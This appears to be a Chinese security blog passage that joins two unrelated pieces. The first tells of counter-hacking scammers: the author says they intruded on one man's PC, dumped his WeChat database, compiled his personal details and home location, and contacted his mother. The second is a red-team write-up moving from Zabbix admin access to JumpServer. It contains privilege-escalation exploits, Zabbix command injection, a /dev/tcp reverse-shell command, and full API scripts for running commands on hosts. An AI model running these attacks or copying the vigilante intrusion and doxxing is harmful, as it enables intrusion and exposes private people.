此时看他也不回话，屏幕也不动，寻思能不能冒险偷偷动下鼠标到右下角网吧管理软件之类的上面，弄出来地址显示，看看这是哪家网吧，定位下金哥位置。

我远程过去的时候，页面显示确是网吧的锁屏界面，刚好我什么都不做，直接就能看到网吧名字了。

那时候还没看到金哥的微信号，不知道他是2003年生人，已经20岁了，以为他只是个小学生、初中生之类的。

于是迅速定位了下周围的学校，倒也却没有发现特别明确的目标。

后来就是问金哥要支付宝，金哥发来个xx涵，估计也不是本人的。

套路了下也没套路来手机号，金哥后来发消息我就没理他了。

金牌黑客的妈妈

第二天没事的时候我看了下金哥的wxdb，发现里面一条消息也没。

虽然网吧电脑刚开始上线的时候瞥到过有两条消息，但是为啥表里是空的呢？我将原因总结为两条：1. 微信登录默认不勾选同步最近消息，金哥没特意去勾，估计电脑登微信就是为了手机复制我的下载地址到电脑。2. wechat的消息貌似也不是实时入库的，相当一部分内容不知道是在内存里还是怎么，账号或者进程退出时才会写库，我打包的是过程中的库，所以消息是空的。

消息是空的没关系，金哥的WeChat通讯录是全量的，我大体看了下，联系上金哥爸妈不是问题。

结合通讯录里的好友、金哥关注的公众号、金哥的微信号，基本能确定金哥的大体人物建模。

姓名：缩写ylt
生日：2003年9月1x号
现在地：浙江嘉兴南湖区广益路与亚太路交汇处附近
老家：河南省洛阳市伊川县平等乡龙王屯村
标签：微信好友里是从鞋子武装到到内裤的各种A货商家

其实现在这个局面也比较尴尬，虽然有点像是一个任意文件下载，但是其实他更像是一个SSRF，因为db虽然是金哥的东西，但是我却没1法直接干金哥一炮，db里的信息都是别人的。

思来想去我决定直接找金哥他妈，算年龄金哥也得20了，害搁网络上弄这些坑人的营生，我得让他妈骂他一顿，让他遭受父母失望的眼光

！

当然了，金哥父母的性格、金哥跟父母的关系也都存在诸多可能，为了一次性把事情说清，我简单查询了一下金哥妈妈的信息，准备好了话术，联系到了她。

我开门见山，金哥妈妈直接反问

我直接把准备好的文字娓娓道来

发完我突然意识到金哥妈妈别再本身有啥身体不适，一下子让我给气过去，我特么岂不是又掉一坑里，话术当中没考虑这些，我赶紧中间插句话安抚下。

正常人肯定都会质疑我的身份，话术早就准备好了，几乎在金哥妈妈问我的同时我就把简单证明真实性的生日发过去了。

其次是一波身份证明+主要证据。金哥家里亲戚的ID都是四字成语，整挺好。

最后又重申了一下要保重身体，别被我气到。

我原本以为金哥妈妈会再有什么问题，或者给我什么回复，但是第一天没等到，到现在也没有等到。看金哥妈妈的朋友圈，属于是妈妈那个年龄段比较爱玩的那种风格，对自己的三个孩子也比较宠爱，会不会真的去找金哥问话、会不会责怪金哥、金哥会不会听，这些还真是不好说。

金哥妈妈问我金哥姓名时我没有回答，但是其实金哥妈妈朋友圈里有他的名字，那个视频是金哥18岁生日在酒店包场过生日的视频，房间里有精神小兄弟给他拉的横幅，巨大的圆桌周围摆了满满一圈百威啤酒，视频下有金哥配的励志格言：“等你攀登上一个新高度，你就会明白，有些翻篇，不靠心态翻，而是靠实力翻”。

试着找到了金哥的两个抖音号，基本是那种半遮半掩想展示点自己不简单的那种风格，这倒是可以理解，谁都经历过那个年龄段。不过看了几个视频，金哥的衣服给我整震惊了，一会一件巴黎世家一会一件迪桑特，金哥妈妈搁家种地，金哥早外面穿巴宝莉？不过后来想到金哥通讯录里武装到内裤的A货商家后我就释然了一些，希望金哥的💰不是当TX客服挣得吧。

其实原本我在气头上想直接把金哥信息不打码全发了，wxdb直接传个ipfs挂他一辈子。但是感受到金哥妈妈沉默的那一刻，我忽然心软了一下，屏幕那头的金哥妈妈当然有可能是完全不care我而非真的无言，但是我怕她跟我妈似的性格其实比较容易受伤害，想了想算了。

第四波骗子 - 天津小伙

别走！还有，负一球！

还记得上文提到的在别人超话帖子下面留言的QQ群么？我加完群后管理员来私聊我，第一回我没继续回复消息，没过多久管理员就把我踢出了群并且把我屏蔽了。

一直没回复消息的原因是后来我搭建好基础设施、写好剧本之后，想到了一种最不理想的可能性，那就是金牌黑客跟QQ群这个小哥是同一个人开展的不同业务形式，假设QQ群这边没有咬钩或者不小心给惊动了，我拿来当素材写文章的金牌黑客那边就比较难了，所以准备充分后我是先联系了金牌黑客。

但是金牌黑客一开始没有理我，我只好双线并行也联系了QQ群这边，所以说两个故事在时间线上其实是交替进行的，为了把故事尽量写的清楚点就分开叙述了。

不收外国钱

换个号加了QQ群，管理员胖头鱼来私聊我

话术纯纯不变，外行的话估计被他给唬的一愣一愣的。

但是相对低调，只说自己是解封人员。

我简单描述下情况

大户有大户的苦衷

小小露富

软硬兼施

不仅web服务那边毛请求都没收到，胖头鱼大哥他妈的给我来一句《不 收 外 国 钱》。

河东区新月花苑

不过介绍完U是啥玩儿之后，他还是心动了，毕竟这么多钱，谁顶得住啊

大哥用了个勾 8⃣️安卓手机，我嫌麻烦没给他准备安卓的端。

大哥一边说不弄了，一边在拿他的iPhone搜，搜了个国内store的媒体类软件，

后面基本就聊不下去了

还寻思再迂回下呢，直接给我屏蔽了🐶登西

我寻思就这么空军了？那roc说过日站得细，手里有啥你得盘一盘啊。

我一看他拍iPhone手机发的原图啊，该不会有EXIF吧。

iPhone直接存到相册里的话是可以读出来这块信息的，而且我个人觉得定位比拿出来经纬度再拿其他地图定位要准一些。

睡一觉缓缓

给我删了之后其实也没啥好聊的了，我再换剧本的话必然要花费精力和时间跟他制造更大的迂回剧本。

这中间的时间我基本是在跟金牌黑客交流，也没顾得上他。突然有天有个相关部门的朋友在群里发了个言，我灵机一动找他帮我做了个图。

我在地图上搜到那栋楼的准确位置，并截图发给朋友，让他跟有震慑性质的标志物合个影。其实这种图P起来成本也不高，但是工地没有PS，只好麻烦别人了。

朋友没一会儿给我发回来一张图，效果比我想的都好。

拿到图片后我感觉自己腰里已经是别了一把枪了，闲着没事的时候我已经在构思以什么样的姿态、什么样的铺垫，扔出这颗震动新月花苑的深水炸弹。

我又换了个号加过去，管理员很快就来私聊我了。

我直接问支付宝咋付款，天津小哥发来个不明所以的东西。我一看你这个很专业啊，还有小卖部给你洗钱？？？

这孩子说话不知道是不是有点缺陷，喜欢只说一个字，不明所以整的很酷一样。

一番纠葛，又特么换了个便利店。

我转过去一分钱，看到对面叫顾云海，看这意思不像是他本人。

我前摇一下，准备摊牌了

这王八犊子都不好奇，手是真快啊，话都没说完果断给我拉黑了艹，我的深水炸弹还没来得及往外扔呢。

我估计他不怕应该是不可能的，因为我没直接给准确的哪个小区哪个楼，避免定位有偏差，马路的覆盖面还是大一些的。

怕立刻加群他察觉出来还是我，过了半个小时我又换了个号加群，但是一直没通过，等了一晚上，直到第二天。

可能是真慌了

第二天早上我又像往常一样在通往工地的地铁上，昨天的加群申请通过了，但是没人来私聊我，只是群里有人发：需解请私聊。

我就主动联系了这个管理员，开门见山。

我不知道对面是什么样的表情，什么样的场景，我只知道这崽子👋是真快啊。

我刚发完图，发完第一段话，基本在发第二段话的同时，群就解散了，我也不能跟他私聊了，估计他看到我的消息后悔也来不及了。

因为记得以前玩QQ的时候，群解散了之后还是可以恢复的，我观察了几天，群一直没有恢复，直到现在也是，估计小伙可能是真慌了。

中间有在我之后加群的，我尝试加了两个人的好友，提醒他们不要被骗，一个没有通过，一个在群解散后通过的。

看空间内容，这人也不像是啥好东西，倒像是个狗推，我怀疑要么是跑路小哥本人，要么是回来探查情况的朋友，小概率是无关人员，就隐晦的吓唬吓唬她。

为了避免天津快手哥明白过来咋回事，我刻意拿手机地图先搜索好位置定位后再截图，而不是直接截图exif的信息。估计看到这篇文章之前，快手哥想破头也整不明白位置是咋泄漏的。

其次我早就想到他可能会解散群聊，所以已经提前把整个群的所有QQ号导了一份，他这个一百多个小号的群真不知道哪儿来的，里面可能也包含其他受害者，根据加群时间应该可以分辨出来，如果有啊sir或者其他朋友感兴趣的话可以公众号私信找我要。

结语与复盘

1. 还是那句话，欲望抬头的时候，我们的眼睛就被蒙住，只能看到自己想看到的了。

2. 子公司业务时不时收到阿三白帽一发一word的垃圾洞，像没有抹除EXIF信息这种他们也发，记得很久很久之前微信原图还没抹这个东西，QQ到现在还没抹也真是我没想到的。

   
   

3. 真的好人还是有的，有两个老哥可能是看到我关注了金牌黑客，过来私聊我别相信他。我表示感谢，并且装了个B哈哈哈哈。

   
   

   
   

   
   

4. 我也不知道该怎么概括，总之就是这种刑拘不够、行拘懒得管的百八十块的诈骗，真的是有够恶心。我揣测天津小伙这种货色兴许是被骗之后自己甘愿也做个恶龙，我一开始寻思找链家管家要个小区单元楼群进去找他爸妈去来着。

   
   

5. 一开始说群狼环伺可能言重了，我都已经做好了跟缅滇地区IP归属对抗的心理准备了，目前看充其量群🐶围绕。

6. 技术上的失误还是有的，一方面是偷懒没准备安卓的管理工具，让天津小伙的剧情简化了许多。另一方面是当时光顾着拖db了，忘了读配置文件，不然可以直接就拿到手机号的来着。

7. 折腾两周多，群友们纯纯看成连续剧了。我本来寻思吓唬金牌黑客逼他把这个ID交出来，由我成为真正的金牌黑客来着，后来想想算了懒得折腾了，他妈找没找他、他还继不继续干我也不关心了，毕竟人家穿巴宝莉咱穿回力，差点实力。

   
   

   173

   
   

   
   

8. 科技公司成为一家独大的民生基础设施，你还真就是更没地儿说理去。

9. 如果你也有一个故事比较多的（冤种）朋友，生活确实比电影更精彩。

后记

写文章的时候我回去贴吧帖子截图，发现跟我交涉那段时间金哥业务竟然没停，有些内容之前没看到

金哥恼羞成怒甚至还要冻人家号

新的受害者还不止一个

也不知道是他妈压根没跟他说，还是说了他不听。我寻思换个号私聊一下跟他谈谈心来着，他又一直没回复我的消息。

我就暂且当做他是醒悟了吧，信息稍稍打码已经是最后的仁慈，被我发现还在当客服的话，金哥啊我可就要毫不犹豫的把你献出去啦。

Hi all，好久不见。

本文记录的是两位朋友在工作时遇到的真实场景，原本21年底答应友人A Roc木木 把文章发公众号的，一拖就是几个月。最近友人B kangkang 又遇到了一次相似的环境，索性把两位好友写的东西放到一起来整一篇文章。

TL;DR

围绕拿到zabbix web管理员权限之后的后渗透，通过读文件、执行命令等操作获取jumpserver的权限。

Roc木木の攻击记录

21年底的一次演习活动，本文只记录拿到zabbix权限到拿下内网堡垒机权限的过程。

0x01 获取zabbix权限

内网扫描，探测到一个自研的资产监控平台，平台使用Django框架开发，且开了debug模式。触发系统报错后，发现在报错的信息中泄露了zabbix服务器和账号密码。

通过该zabbix账号密码，进入到zabbix的后台，且当前用户为管理员权限。

对zabbix系统上监控的主机进行观察和分析，发现jumpserver服务器在zabbix监控主机范围中。

此时想到wfox关于zabbix权限利用的文章 http://noahblog.360.cn/zabbixgong-ji-mian-wa-jue-yu-li-yong/，初步猜想应当可以借助zabbix读取jumpserver服务器的文件。

0x02 获取zabbix server权限

老样子，首先添加zabbix脚本，在创建脚本的时候选择zabbix服务器，然后在监测 --> 最新数据下面筛选zabbix server，并下发脚本执行命令，成功获取zabbix服务器权限。

在zabbix server上尝试利用zabbix_get命令读取文件，但是出现如下错误：

通过查阅资料且重新检查了一下zabbix server的配置后发现，jumpserver是通过zabbix proxy进行数据上报，所以只能在接收jumpserver上报数据的zabbix proxy服务器上使用zabbix_get命令，此外还有一种方法是wfox文章中的第6点，通过添加监控项进行文件读取。实际渗透过程中没有注意到这一点，而是通过拿下了zabbix proxy服务器权限来实现的文件读取。

0x03 获取zabbix proxy服务器权限

在获取了zabbix server服务器权限后，由于不能直接使用zabbix_get命令进行读文件，于是尝试先对zabbix server服务器进行提权。

如图所示，服务器是centos，sudo版本为1.8.19p2，遂使用https://github.com/worawit/CVE-2021-3156项目进行提权。

直接使用exploit_defaults_mailer.py这个脚本进行提权，但是这个脚本在获取sudo版本的时候有一些bug，需要手动修改一下第141行为当前sudo的版本：

 sudo_vers = [1, 8, 19] # get_sudo_version()

提权成功：

提权成功后，对主机进行信息收集，发现了一个数据库账号密码（user01/password），且同时发现服务器上存在user01用户，于是尝试用（user01/password）进行横向的SSH爆破，很幸运，成功拿下了zabbix proxy服务器的权限。

0x04 zabbix任意文件读取

在zabbix proxy服务器上，成功利用zabbix_get读取到了jumpserver服务器文件。（此处图片为本地场景复现）

于是开始思考如何利用zabbix任意文件读去获取jumpserver服务器权限，首先尝试读取jumpserver的配置文件，配置文件默认位置是：/opt/jumpserver/config/config.txt

jumpserver未对目录进行权限限制，所以可以读取到jumpserver的配置文件信息，但是jumpserver默认是使用docker构建，且数据库和redis都没有映射出来，所以读取出来的redis和数据库账号密码没办法直接利用。

于是本地搭建jumpserver环境，首先了解了 /opt/jumpserver 目录下的目录结构，又根据之前jumpserver的日志文件泄露漏洞，想通过读取日志文件信息，进而获取jumpserver服务器权限，默认的日志文件路径为：/opt/jumpserver/core/logs/jumpserver.log

但是zabbix_get读取文件内容存在限制，仅能读取小于64KB大小的文件，

翻了一下zabbix关于利用vfs.file.contents读文件的文档：https://www.zabbix.com/documentation/4.0/en/manual/config/items/itemtypes/zabbix_agent，发现除了vfs.file.contents外，还有一个vfs.file.regexp操作，大概的意思就是输出特定正则匹配的某一行，然后可以指定从开始和结束的行号。

于是利用该方法写了一个简单的任意读文件的脚本（还不够完善），来突破文件读取的大小限制：

from __future__ import print_function
import subprocess
target = "192.168.21.166"
file = "/opt/jumpserver/core/logs/jumpserver.log"
for i in range(1, 2000):
    cmd = 'vfs.file.regexp[{file},".*",,{start},{end},]'.format(file=file, start=i, end=i+1)
    p = subprocess.Popen(["zabbix_get", "-s", target, "-k", cmd], stdout=subprocess.PIPE)
    result, error = p.communicate()
    print(result, end="")

成功读取任意位置的文件内容：

通过读取配置文件，尝试使用https://paper.seebug.org/1502/文章中说的方法无果，且文章中利用到的如下两个未授权接口，从jumpserver 2.6.2版本开始也被修复。

/api/v1/authentication/connection-token/
/api/v1/users/connection-token/

于是尝试读取redis的dump文件，想通过redis获取缓存中的session，读了很久但是也没有读取到，不知道是缓存中没有session还是其他原因。

还尝试了通过读取数据库文件（/opt/jumpserver/mysql/data/jumpserver/）去获取配置信息，但是数据库文件权限不够，没办法读取。

0x05 jumpserver服务账号利用

回看读取到的jumpserver配置文件，发现了jumpserver的两个配置项SECRET_KEY和BOOTSTRAP_TOKEN

SECRET_KEY比较熟悉，是Django框架中的配置项，BOOTSTRAP_TOKEN这个比较眼生，对jumpserver源码进行分析，发现BOOTSTRAP_TOKEN是jumpserver中注册服务账号时用来认证的。

参考jumpserver的官方文档，https://docs.jumpserver.org/zh/master/dev/build，jumpserver的服务架构如下：

jumpserver由多个服务组成，核心是core组件，还包括luna（JumpServer Web Terminal 前端）、lina（前端 UI）、koko（JumpServer 字符协议资产连接组件，支持 SSH, Telnet, MySQL, Kubernets, SFTP, SQL Server）、lion（JumpServer 图形协议资产连接组件，支持 RDP, VNC）组件，各个组件与core之间通过API进行调用。

各个组件与core之间的API调用是通过AccessKey进行认证鉴权，AccessKey是在服务启动时通过BOOTSTRAP_TOKEN向core模块注册服务账号来获取的，下面是koko模块注册的代码（https://github.com/jumpserver/koko/blob/00cee388993ee6e92889df24aa033d09ce132fc5/pkg/koko/koko.go）

调用MustLoadValidAccessKey方法返回AccessKey，

从文件中获取，如果没有则调用MustRegisterTerminalAccount方法，这个文件的位置在：/opt/jumpserver/koko/data/keys/.access_key

注册TerminalAccount的流程如下：

实际注册服务账号的方法如下

请求/api/v1/terminal/terminal-registrations/接口，并在Authorization头中带上BootstrapToken即可。

请求接口

curl http://192.168.21.166/api/v1/terminal/terminal-registrations/ -H "Authorization: BootstrapToken M0ZDNTRENTYtODA4OS1DRTA0" --data "name=test&comment=koko&type=koko"

会给你一个access key

或者也可以直接通过读取/opt/jumpserver/koko/data/keys/.access_key文件来获取accesskey。

有了access key后，就可以通过jumpserver的API进行利用，下面是通过jumpserver ops运维接口执行命令。

1. 首先通过/api/v1/assets/assets/?offset=0&limit=15&display=1&draw=1 接口找到想要执行命令的主机

def get_assets_assets(jms_url, auth):
    url = jms_url + '/api/v1/assets/assets/?offset=0&limit=15&display=1&draw=1'
    gmt_form = '%a, %d %b %Y %H:%M:%S GMT'
    headers = {
        'Accept': 'application/json',
        'X-JMS-ORG': '00000000-0000-0000-0000-000000000002',
        'Date': datetime.datetime.utcnow().strftime(gmt_form)
    }
    response = requests.get(url, auth=auth, headers=headers)
    print(response.text)

这里需要记住主机的资产ID，和admin_user的内容。

2. 然后利用api/v1/ops/command-executions接口对指定主机执行命令

代码如下，修改data中的主机和run_as内容为第一步找到的id和admin_user，command为需要执行的命令。

def get_ops_command_executions(jms_url, auth):
    url = jms_url + '/api/v1/ops/command-executions/'
    gmt_form = '%a, %d %b %Y %H:%M:%S GMT'
    headers = {
        'Accept': 'application/json',
        'X-JMS-ORG': '00000000-0000-0000-0000-000000000002',
        'Date': datetime.datetime.utcnow().strftime(gmt_form)
    }
    data = {"hosts":["fdfafb91-7b0a-425a-b250-56599bfc761b"],"run_as":"973320fd-6f06-4f59-8758-8ee52b6f7283","command":"whoami"}
    response = requests.post(url, auth=auth, headers=headers, data=data)
    print(response.text)

3. 访问log_url，获取命令执行的结果。

def get_task_log(jms_url, auth):
    url = jms_url + '/api/v1/ops/celery/task/e70ce2ab-1831-46d0-a4d1-ecc968dce298/log/'
    gmt_form = '%a, %d %b %Y %H:%M:%S GMT'
    headers = {
        'Accept': 'application/json',
        'X-JMS-ORG': '00000000-0000-0000-0000-000000000002',
        'Date': datetime.datetime.utcnow().strftime(gmt_form)
    }
    response = requests.get(url, auth=auth, headers=headers)
    print(response.text)

完整的利用脚本如下：

# Python 示例
# pip install requests drf-httpsig
import requests, datetime, json
from httpsig.requests_auth import HTTPSignatureAuth
def get_auth(KeyID, SecretID):
    signature_headers = ['(request-target)', 'accept', 'date']
    auth = HTTPSignatureAuth(key_id=KeyID, secret=SecretID, algorithm='hmac-sha256', headers=signature_headers)
    return auth
def get_user_info(jms_url, auth):
    url = jms_url + '/api/v1/users/users/'
    gmt_form = '%a, %d %b %Y %H:%M:%S GMT'
    headers = {
        'Accept': 'application/json',
        'X-JMS-ORG': '00000000-0000-0000-0000-000000000002',
        'Date': datetime.datetime.utcnow().strftime(gmt_form)
    }
    response = requests.get(url, auth=auth, headers=headers)
    print(response.text)
def post_ops_command_executions(jms_url, auth):
    url = jms_url + '/api/v1/ops/command-executions/'
    gmt_form = '%a, %d %b %Y %H:%M:%S GMT'
    headers = {
        'Accept': 'application/json',
        'X-JMS-ORG': '00000000-0000-0000-0000-000000000002',
        'Date': datetime.datetime.utcnow().strftime(gmt_form)
    }
    data = {"hosts":["fdfafb91-7b0a-425a-b250-56599bfc761b"],"run_as":"973320fd-6f06-4f59-8758-8ee52b6f7283","command":"whoami"}
    response = requests.post(url, auth=auth, headers=headers, data=data)
    print(response.text)
def get_task_log(jms_url, auth):
    url = jms_url + '/api/v1/ops/celery/task/e70ce2ab-1831-46d0-a4d1-ecc968dce298/log/'
    gmt_form = '%a, %d %b %Y %H:%M:%S GMT'
    headers = {
        'Accept': 'application/json',
        'X-JMS-ORG': '00000000-0000-0000-0000-000000000002',
        'Date': datetime.datetime.utcnow().strftime(gmt_form)
    }
    response = requests.get(url, auth=auth, headers=headers)
    print(response.text)
def get_assets_assets(jms_url, auth):
    url = jms_url + '/api/v1/assets/assets/?offset=0&limit=15&display=1&draw=1'
    gmt_form = '%a, %d %b %Y %H:%M:%S GMT'
    headers = {
        'Accept': 'application/json',
        'X-JMS-ORG': '00000000-0000-0000-0000-000000000002',
        'Date': datetime.datetime.utcnow().strftime(gmt_form)
    }
    response = requests.get(url, auth=auth, headers=headers)
    print(response.text)
if __name__ == '__main__':
    jms_url = 'http://192.168.21.166'
    KeyID = '75ed41cf-c41d-4117-a892-da9c76698d26'
    SecretID = 'ce3cdec3-df9e-439a-8824-2cefe15ec95f'
    auth = get_auth(KeyID, SecretID)
    get_task_log(jms_url, auth)
    # get_assets_assets(jms_url, auth)

脚本可以批量执行命令，jumpserver自身也在被管理清单中，至此成功拿下jumpserver堡垒机。

Roc木木日站唯细不破，名言众多，今日分享比较应景的一则：

kangkangの攻击记录

0x01 获取Zabbix后台权限

一次项目，对部分 ip 进行了全端口扫描，发现一个非常见端口的 apache 页面。

目录扫描探测到了zabbix目录，找到管理后台。

默认密码 admin:zabbix，成功登陆。

0x02 获取zabbix服务器权限

在 Zabbix Web 上添加脚本，“执行在”选项可根据需求选择，“执行在 Zabbix 服务器” 不需要 开启 EnableRemoteCommands 参数，所以一般控制 Zabbix Web 后可通过该方式在 Zabbix Server 上执行命令拿到服务器权限。

创建完脚本后，找到 server 主机进行执行脚本。选择类型是“执行在 Zabbix 服务器”， 无论选择哪台主机执行脚本，最终都是执行在 Zabbix Server 上。

执行命令后收到反弹回来的 shell，默认是 zabbix 权限，权限较低。正好可以借机会试一下最近star比较多的综合提权工具 https://github.com/liamg/traitor，并没有测试成功。

单独试了一下 CVE-2021-4034 Linux Polkit 提权脚本，地址 https://github.com/berdav/CVE-2021-4034。在目标服务器上进行编译、执行，顺利提权。

提权完成后写了公钥，通过 ssh 登陆服务器。开始进行信息搜集，查 history、翻文件、看进程、看连接。没有发现太多有用信息，只找到了数据库配置文件，进程也大都是跟 agent 进行通信。

接下来想扩大战果，还有两个方向：

1、内网横向扫描

2、尝试在Agent上远程执行系统命令

目标当前属于 192.168 段，在history和last当中发现了 10 段地址，粗略检测192、172、10三个网段的存活之后没有新的发现，所以开始着手尝试攻击agent。

0x03 获取Zabbix Agent 服务器权限

（1）直接执行命令控制agent

众所周知想在agent上远程执行系统命令需要在 zabbix_agentd.conf 配置文件中开启 EnableRemoteCommands 参数 （默认关闭）。

如果在 zabbix_agentd.conf 中开启了 EnableRemoteCommands=1 参数，一样可以通过在 web 后台创建脚本的方法，选择在 agent 上执行。但是后台中所有的 agent 都没有开启这个参数。所以需要尝试别的办法。

（2）任意文件读取

通过在fox文章中学到的， Zabbix 的原生监控项中，vfs.file.contents 命令可以读取指定文件，但无法读取超过64KB 的文件。且 agent 默认以 zabbix 权限运行，无法读取 history 等敏感文件。

但是我们可以查看 agent 服务器配置，zabbix_get 可能不在环境变量中，可以通过 find命令进行寻找。

zabbix_get -s 172.19.0.5 -p 10050 -k "vfs.file.contents[/etc/zabbix/zabbix_agentd.conf]"

通过读取zabbix agent端的配置文件，可以看到 EnableRemoteCommands 确实没有配置 ，但是可以看到配置中开启了fox文章中提到的另一个参数 UnsafeUserParameters=1。

当 Zabbiax Agent 的 zabbix_agentd.conf 配置文件开启 UnsafeUserParameters 参数的情况下，传参值字符不受限制，只需要找到存在传参的自定义参数UserParameter，就能实现命令注入。

起初对漏洞原理不理解，没有搞清楚这里命令注入的意思，后来问过fox才整明白此处命令注入所注入的就是用户自定义的命令。选择一个函数如 chk.ssl_access[1, && id]，成功执行命令。

zabbix_get -s 172.19.0.5 -p 10050 -k "chk.ssl_access[1, && id]"

0x04 获取Jumpserver权限

为了确认该系统有哪些业务，选择了一台标签为 web 的机器，进行反弹 shell。

zabbix_get -s 172.19.19.19 -p 10050 -k "chk.ssl_access[1, &&bash -i >&/dev/tcp/1.1.1.1/443 0>&1]"

同样使用 CVE-2021-4034 进行提权，查看进程，是一个 java 起的网站， 然后用 nginx 做了访问控制。

打web服务和数据库的过程此处略过。通过 last 命令查看服务器的登陆 ip，发现都是从一个 ip 进行登陆，扫了一下该 ip 的全端口，在一个比较偏的端口发现了jumpserver服务。

恰巧这台也在 zabbix agent 里，重复之前操作，拿下这台 jumpserver 服务器。

通过自有脚本添加 jumpserver 超级管理员：

cd /opt/jumpserver/apps
python manage.py createsuperuser --username=user --email=user@domain.com 

成功进入

课代表划重点

1. Django的debug有时会闯大祸，同理其他debug也是，例如laravel等等。
2. Agent通过zabbix proxy对server进行数据上报的话，只有在zabbix proxy服务器上才能agent使用zabbix_get命令读取文件。
3. jumpserver的配置文件权限控制不严格，zabbix用户即可读。
4. vfs.file.regexp 可以突破 vfs.file.contents 读取文件的大小限制。
5. 通过配置文件中的BootstrapToken和accesskey可以实现通过服务账户控制jumpserver内的主机。
6. EnableRemoteCommands 参数未开启时可以关注 UnsafeUserParameters 参数，避免措施打agent的机会。
7. jumpserver自带的脚本可以直接添加新用户进入系统。

注：Roc木木的文章距离当前有一段时间，当时还没有出现  Polkit 和 DirtyPipe 提权。

LAST

公众号荒废的这段时间里工作和生活都发生了很多的变化，不过没变的倒是自己一直以来疯狂欠学习的状态。有趣的事情倒是也遇到过一些、写过一些，有机会的话再发一发。

两年多的时间风云变幻，疾病、战争、行业风口更迭，感谢还在关注的大伙们，祝大家健康平安，诸事顺遂。